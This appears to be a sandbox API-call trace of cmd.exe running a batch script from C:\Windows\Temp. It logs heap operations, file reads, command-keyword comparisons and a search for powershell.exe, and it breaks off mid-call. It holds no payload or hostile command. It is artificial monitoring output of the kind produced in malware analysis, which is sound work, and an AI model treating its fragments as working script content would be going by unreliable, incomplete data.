[0177.351] GetFileType (hFile=0x84) returned 0x1 [0177.351] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.351] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x10e4 [0177.351] GetProcessHeap () returned 0x19a8f1e0000 [0177.351] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f203820 [0177.351] GetProcessHeap () returned 0x19a8f1e0000 [0177.351] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f203820) returned 1 [0177.352] GetProcessHeap () returned 0x19a8f1e0000 [0177.352] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee010 [0177.352] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0177.352] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0177.352] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0177.352] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0177.352] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0177.352] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0177.352] GetProcessHeap () returned 0x19a8f1e0000 [0177.352] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edc50 [0177.352] GetProcessHeap () returned 0x19a8f1e0000 [0177.352] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb7d0 [0177.352] GetProcessHeap () returned 0x19a8f1e0000 [0177.352] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x2a) returned 0x19a8f1e0df0 [0177.352] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.352] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x10e4 [0177.352] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe800, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe800*=0x1fff, lpOverlapped=0x0) returned 1 [0177.352] SetFilePointer (in: hFile=0x84, lDistanceToMove=4337, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x10f1 [0177.353] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="goto MASend\r\n", cbMultiByte=13, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="goto MASend\r\n...\r\nd powershell.exe in the system.\r\n (\r\n1 and their Server equivalent.\r\n===================================================\r\n") returned 13 [0177.353] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.353] GetFileType (hFile=0x84) returned 0x1 [0177.353] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.353] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x10f1 [0177.353] GetProcessHeap () returned 0x19a8f1e0000 [0177.353] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f203820 [0177.353] GetProcessHeap () returned 0x19a8f1e0000 [0177.353] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f203820) returned 1 [0177.353] GetProcessHeap () returned 0x19a8f1e0000 [0177.353] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee550 [0177.353] _wcsicmp (_String1="FOR", _String2="goto") returned -1 [0177.354] _wcsicmp (_String1="FOR/?", _String2="goto") returned -1 [0177.354] _wcsicmp (_String1="IF", _String2="goto") returned 2 [0177.354] _wcsicmp (_String1="IF/?", _String2="goto") returned 2 [0177.354] _wcsicmp (_String1="REM", _String2="goto") returned 11 [0177.354] _wcsicmp (_String1="REM/?", _String2="goto") returned 11 [0177.354] GetProcessHeap () returned 0x19a8f1e0000 [0177.354] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee610 [0177.354] GetProcessHeap () returned 0x19a8f1e0000 [0177.354] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb860 [0177.354] GetProcessHeap () returned 0x19a8f1e0000 [0177.354] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb950 [0177.354] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.354] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x10f1 [0177.354] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe7d0, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe7d0*=0x1fff, lpOverlapped=0x0) returned 1 [0177.354] SetFilePointer (in: hFile=0x84, lDistanceToMove=4340, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x10f4 [0177.354] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=")\r\n", cbMultiByte=3, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr=")\r\no MASend\r\n...\r\nd powershell.exe in the system.\r\n (\r\n1 and their Server equivalent.\r\n===================================================\r\n") returned 3 [0177.354] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.354] GetFileType (hFile=0x84) returned 0x1 [0177.355] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.355] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x10f4 [0177.355] GetProcessHeap () returned 0x19a8f1e0000 [0177.355] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f203820 [0177.355] GetProcessHeap () returned 0x19a8f1e0000 [0177.355] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f203820) returned 1 [0177.355] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0177.355] _tell (_FileHandle=3) returned 4340 [0177.355] _close (_FileHandle=3) returned 0 [0177.356] GetProcessHeap () returned 0x19a8f1e0000 [0177.356] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x58) returned 0x19a8f1f8d00 [0177.356] GetProcessHeap () returned 0x19a8f1e0000 [0177.356] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x14) returned 0x19a8f1ec700 [0177.356] GetProcessHeap () returned 0x19a8f1e0000 [0177.356] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec740 [0177.356] GetProcessHeap () returned 0x19a8f1e0000 [0177.356] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4c) returned 0x19a8f1f8a60 [0177.356] GetProcessHeap () returned 0x19a8f1e0000 [0177.356] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1f8a60, Size=0x30) returned 0x19a8f1e0eb0 [0177.356] GetProcessHeap () returned 0x19a8f1e0000 [0177.356] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1e0eb0) returned 0x30 [0177.356] GetProcessHeap () returned 0x19a8f1e0000 [0177.356] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f203820 [0177.356] GetProcessHeap () returned 0x19a8f1e0000 [0177.356] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb6e0 [0177.356] GetProcessHeap () returned 0x19a8f1e0000 [0177.356] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb980 [0177.356] _wcsnicmp (_String1="PATH", _String2="=C:=", _MaxCount=0x4) returned 51 [0177.356] _wcsnicmp (_String1="PATH", _String2="=Exi", _MaxCount=0x4) returned 51 [0177.357] _wcsnicmp (_String1="PATH", _String2="ALLU", _MaxCount=0x4) returned 15 [0177.357] _wcsnicmp (_String1="PATH", _String2="APPD", _MaxCount=0x4) returned 15 [0177.357] _wcsnicmp (_String1="PATH", _String2="Blac", _MaxCount=0x4) returned 14 [0177.357] _wcsnicmp (_String1="PATH", _String2="Blue", _MaxCount=0x4) returned 14 [0177.357] _wcsnicmp (_String1="PATH", _String2="Comm", _MaxCount=0x4) returned 13 [0177.357] _wcsnicmp (_String1="PATH", _String2="Comm", _MaxCount=0x4) returned 13 [0177.357] _wcsnicmp (_String1="PATH", _String2="Comm", _MaxCount=0x4) returned 13 [0177.357] _wcsnicmp (_String1="PATH", _String2="COMP", _MaxCount=0x4) returned 13 [0177.357] _wcsnicmp (_String1="PATH", _String2="ComS", _MaxCount=0x4) returned 13 [0177.357] _wcsnicmp (_String1="PATH", _String2="elin", _MaxCount=0x4) returned 11 [0177.357] _wcsnicmp (_String1="PATH", _String2="esc=", _MaxCount=0x4) returned 11 [0177.357] _wcsnicmp (_String1="PATH", _String2="Gray", _MaxCount=0x4) returned 9 [0177.357] _wcsnicmp (_String1="PATH", _String2="Gree", _MaxCount=0x4) returned 9 [0177.357] _wcsnicmp (_String1="PATH", _String2="HOME", _MaxCount=0x4) returned 8 [0177.357] _wcsnicmp (_String1="PATH", _String2="HOME", _MaxCount=0x4) returned 8 [0177.357] _wcsnicmp (_String1="PATH", _String2="LOCA", _MaxCount=0x4) returned 4 [0177.357] _wcsnicmp (_String1="PATH", _String2="LOGO", _MaxCount=0x4) returned 4 [0177.357] _wcsnicmp (_String1="PATH", _String2="Mage", _MaxCount=0x4) returned 3 [0177.357] _wcsnicmp (_String1="PATH", _String2="mas=", _MaxCount=0x4) returned 3 [0177.357] _wcsnicmp (_String1="PATH", _String2="masv", _MaxCount=0x4) returned 3 [0177.357] _wcsnicmp (_String1="PATH", _String2="ncel", _MaxCount=0x4) returned 2 [0177.357] _wcsnicmp (_String1="PATH", _String2="nul=", _MaxCount=0x4) returned 2 [0177.357] _wcsnicmp (_String1="PATH", _String2="nul1", _MaxCount=0x4) returned 2 [0177.357] _wcsnicmp (_String1="PATH", _String2="nul2", _MaxCount=0x4) returned 2 [0177.358] _wcsnicmp (_String1="PATH", _String2="nul6", _MaxCount=0x4) returned 2 [0177.358] _wcsnicmp (_String1="PATH", _String2="NUMB", _MaxCount=0x4) returned 2 [0177.358] _wcsnicmp (_String1="PATH", _String2="OS=W", _MaxCount=0x4) returned 1 [0177.358] _wcsnicmp (_String1="PATH", _String2="Path", _MaxCount=0x4) returned 0 [0177.358] GetProcessHeap () returned 0x19a8f1e0000 [0177.358] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb980) returned 1 [0177.358] GetProcessHeap () returned 0x19a8f1e0000 [0177.358] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6e0) returned 1 [0177.358] SearchPathW (in: lpPath="C:\\Windows\\System32;C:\\Windows\\System32\\wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFileName="powershell.exe", lpExtension=0x0, nBufferLength=0x208, lpBuffer=0x43f9efe520, lpFilePart=0x43f9efe080 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x43f9efe080*="powershell.exe") returned 0x39 [0177.359] FindFirstFileW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), lpFindFileData=0x43f9efddb0 | out: lpFindFileData=0x43f9efddb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xe782115b, ftLastAccessTime.dwHighDateTime=0x1da42d4, ftLastWriteTime.dwLowDateTime=0xe782115b, ftLastWriteTime.dwHighDateTime=0x1da42d4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740070, dwReserved1=0x200073, cFileName="Windows", cAlternateFileName="")) returned 0x19a8f1f86a0 [0177.359] FindClose (in: hFindFile=0x19a8f1f86a0 | out: hFindFile=0x19a8f1f86a0) returned 1 [0177.359] memcpy (in: _Dst=0x43f9efe526, _Src=0x43f9efdddc, _Size=0xe | out: _Dst=0x43f9efe526) returned 0x43f9efe526 [0177.359] FindFirstFileW (in: lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32"), lpFindFileData=0x43f9efddb0 | out: lpFindFileData=0x43f9efddb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf91084a6, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf91084a6, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740070, dwReserved1=0x200073, cFileName="System32", cAlternateFileName="")) returned 0x19a8f1f8940 [0177.359] FindClose (in: hFindFile=0x19a8f1f8940 | out: hFindFile=0x19a8f1f8940) returned 1 [0177.359] memcpy (in: _Dst=0x43f9efe536, _Src=0x43f9efdddc, _Size=0x10 | out: _Dst=0x43f9efe536) returned 0x43f9efe536 [0177.359] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell" (normalized: "c:\\windows\\system32\\windowspowershell"), lpFindFileData=0x43f9efddb0 | out: lpFindFileData=0x43f9efddb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x12fbf40, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x12fbf40, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740070, dwReserved1=0x200073, cFileName="WindowsPowerShell", cAlternateFileName="WINDOW~1")) returned 0x19a8f1f86a0 [0177.360] FindClose (in: hFindFile=0x19a8f1f86a0 | out: hFindFile=0x19a8f1f86a0) returned 1 [0177.360] _wcsnicmp (_String1="WINDOW~1", _String2="WindowsPowerShell", _MaxCount=0x11) returned 11 [0177.360] memcpy (in: _Dst=0x43f9efe548, _Src=0x43f9efdddc, _Size=0x22 | out: _Dst=0x43f9efe548) returned 0x43f9efe548 [0177.360] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), lpFindFileData=0x43f9efddb0 | out: lpFindFileData=0x43f9efddb0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740070, dwReserved1=0x200073, cFileName="v1.0", cAlternateFileName="")) returned 0x19a8f1f8c40 [0177.360] FindClose (in: hFindFile=0x19a8f1f8c40 | out: hFindFile=0x19a8f1f8c40) returned 1 [0177.360] memcpy (in: _Dst=0x43f9efe56c, _Src=0x43f9efdddc, _Size=0x8 | out: _Dst=0x43f9efe56c) returned 0x43f9efe56c [0177.360] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), lpFindFileData=0x43f9efddb0 | out: lpFindFileData=0x43f9efddb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f2c94e9, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f2c94e9, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2c94e9, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74a00, dwReserved0=0x740070, dwReserved1=0x200073, cFileName="powershell.exe", cAlternateFileName="")) returned 0x19a8f1f8b80 [0177.360] FindClose (in: hFindFile=0x19a8f1f8b80 | out: hFindFile=0x19a8f1f8b80) returned 1 [0177.360] memcpy (in: _Dst=0x43f9efe576, _Src=0x43f9efdddc, _Size=0x1c | out: _Dst=0x43f9efe576) returned 0x43f9efe576 [0177.361] GetProcessHeap () returned 0x19a8f1e0000 [0177.361] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x84) returned 0x19a8f1eabb0 [0177.361] GetProcessHeap () returned 0x19a8f1e0000 [0177.361] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f203820, Size=0x1f0) returned 0x19a8f203820 [0177.361] GetProcessHeap () returned 0x19a8f1e0000 [0177.361] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f203820) returned 0x1f0 [0177.361] GetProcessHeap () returned 0x19a8f1e0000 [0177.361] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f203a20 [0177.361] GetProcessHeap () returned 0x19a8f1e0000 [0177.361] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f203a20, Size=0x28) returned 0x19a8f203a20 [0177.361] GetProcessHeap () returned 0x19a8f1e0000 [0177.361] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f203a20) returned 0x28 [0177.361] GetProcessHeap () returned 0x19a8f1e0000 [0177.361] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f203a60 [0177.361] GetProcessHeap () returned 0x19a8f1e0000 [0177.361] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f203a60, Size=0x40) returned 0x19a8f203a60 [0177.361] GetProcessHeap () returned 0x19a8f1e0000 [0177.361] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f203a60) returned 0x40 [0177.361] GetProcessHeap () returned 0x19a8f1e0000 [0177.361] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f203ab0 [0177.361] GetProcessHeap () returned 0x19a8f1e0000 [0177.361] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f203ab0, Size=0x20) returned 0x19a8f203ab0 [0177.361] GetProcessHeap () returned 0x19a8f1e0000 [0177.361] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f203ab0) returned 0x20 [0177.361] GetProcessHeap () returned 0x19a8f1e0000 [0177.361] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f203ae0 [0177.362] GetProcessHeap () returned 0x19a8f1e0000 [0177.362] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f203ae0, Size=0x38) returned 0x19a8f203ae0 [0177.362] GetProcessHeap () returned 0x19a8f1e0000 [0177.362] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f203ae0) returned 0x38 [0177.362] GetProcessHeap () returned 0x19a8f1e0000 [0177.362] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f203b30 [0177.362] GetProcessHeap () returned 0x19a8f1e0000 [0177.362] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f203b30, Size=0xa0) returned 0x19a8f203b30 [0177.362] GetProcessHeap () returned 0x19a8f1e0000 [0177.362] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f203b30) returned 0xa0 [0177.362] GetProcessHeap () returned 0x19a8f1e0000 [0177.362] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f203be0 [0177.362] GetProcessHeap () returned 0x19a8f1e0000 [0177.362] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f203be0, Size=0x40) returned 0x19a8f203be0 [0177.362] GetProcessHeap () returned 0x19a8f1e0000 [0177.362] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f203be0) returned 0x40 [0177.362] GetProcessHeap () returned 0x19a8f1e0000 [0177.362] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f203c30 [0177.362] GetProcessHeap () returned 0x19a8f1e0000 [0177.362] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f203c30, Size=0x38) returned 0x19a8f203c30 [0177.362] GetProcessHeap () returned 0x19a8f1e0000 [0177.362] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f203c30) returned 0x38 [0177.362] GetProcessHeap () returned 0x19a8f1e0000 [0177.362] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f203c80 [0177.362] GetProcessHeap () returned 0x19a8f1e0000 [0177.362] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f203c80, Size=0x180) returned 0x19a8f203c80 [0177.362] GetProcessHeap () returned 0x19a8f1e0000 [0177.362] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f203c80) returned 0x180 [0177.362] GetProcessHeap () returned 0x19a8f1e0000 [0177.363] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f203e10 [0177.363] GetProcessHeap () returned 0x19a8f1e0000 [0177.363] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f203e10, Size=0x38) returned 0x19a8f203e10 [0177.363] GetProcessHeap () returned 0x19a8f1e0000 [0177.363] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f203e10) returned 0x38 [0177.363] GetProcessHeap () returned 0x19a8f1e0000 [0177.363] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f203e60 [0177.363] GetProcessHeap () returned 0x19a8f1e0000 [0177.363] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f203e60, Size=0x78) returned 0x19a8f203e60 [0177.363] GetProcessHeap () returned 0x19a8f1e0000 [0177.363] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f203e60) returned 0x78 [0177.363] GetProcessHeap () returned 0x19a8f1e0000 [0177.363] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f203ef0 [0177.363] GetProcessHeap () returned 0x19a8f1e0000 [0177.363] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f203ef0, Size=0x38) returned 0x19a8f203ef0 [0177.363] GetProcessHeap () returned 0x19a8f1e0000 [0177.363] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f203ef0) returned 0x38 [0177.363] GetProcessHeap () returned 0x19a8f1e0000 [0177.363] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f203f40 [0177.363] GetProcessHeap () returned 0x19a8f1e0000 [0177.363] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f203f40, Size=0x50) returned 0x19a8f203f40 [0177.363] GetProcessHeap () returned 0x19a8f1e0000 [0177.363] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f203f40) returned 0x50 [0177.363] lstrcmpW (lpString1="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"", lpString2="\"\"") returned 1 [0177.363] _get_osfhandle (_FileHandle=1) returned 0x24 [0177.363] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0177.366] _get_osfhandle (_FileHandle=1) returned 0x24 [0177.366] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0177.366] _get_osfhandle (_FileHandle=0) returned 0x20 [0177.366] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0177.367] SetConsoleInputExeNameW () returned 0x1 [0177.367] GetConsoleOutputCP () returned 0x1b5 [0177.367] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0177.367] SetThreadUILanguage (LangId=0x0) returned 0x409 [0177.370] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x84 [0177.370] _open_osfhandle (_OSFileHandle=0x84, _Flags=8) returned 3 [0177.370] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.370] SetFilePointer (in: hFile=0x84, lDistanceToMove=4340, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x10f4 [0177.370] GetProcessHeap () returned 0x19a8f1e0000 [0177.371] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f203f40) returned 1 [0177.371] GetProcessHeap () returned 0x19a8f1e0000 [0177.371] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f203ef0) returned 1 [0177.371] GetProcessHeap () returned 0x19a8f1e0000 [0177.371] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f203e60) returned 1 [0177.372] GetProcessHeap () returned 0x19a8f1e0000 [0177.372] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f203e10) returned 1 [0177.372] GetProcessHeap () returned 0x19a8f1e0000 [0177.372] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f203c80) returned 1 [0177.372] GetProcessHeap () returned 0x19a8f1e0000 [0177.372] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f203c30) returned 1 [0177.373] GetProcessHeap () returned 0x19a8f1e0000 [0177.373] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f203be0) returned 1 [0177.373] GetProcessHeap () returned 0x19a8f1e0000 [0177.373] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f203b30) returned 1 [0177.373] GetProcessHeap () returned 0x19a8f1e0000 [0177.373] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f203ae0) returned 1 [0177.373] GetProcessHeap () returned 0x19a8f1e0000 [0177.374] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f203ab0) returned 1 [0177.374] GetProcessHeap () returned 0x19a8f1e0000 [0177.374] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f203a60) returned 1 [0177.374] GetProcessHeap () returned 0x19a8f1e0000 [0177.374] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f203a20) returned 1 [0177.374] GetProcessHeap () returned 0x19a8f1e0000 [0177.375] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eabb0) returned 1 [0177.375] GetProcessHeap () returned 0x19a8f1e0000 [0177.375] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f203820) returned 1 [0177.375] GetProcessHeap () returned 0x19a8f1e0000 [0177.375] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0eb0) returned 1 [0177.375] GetProcessHeap () returned 0x19a8f1e0000 [0177.375] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec740) returned 1 [0177.376] GetProcessHeap () returned 0x19a8f1e0000 [0177.376] RtlFreeHeap (HeapHandle=0x19a8f1e0000, 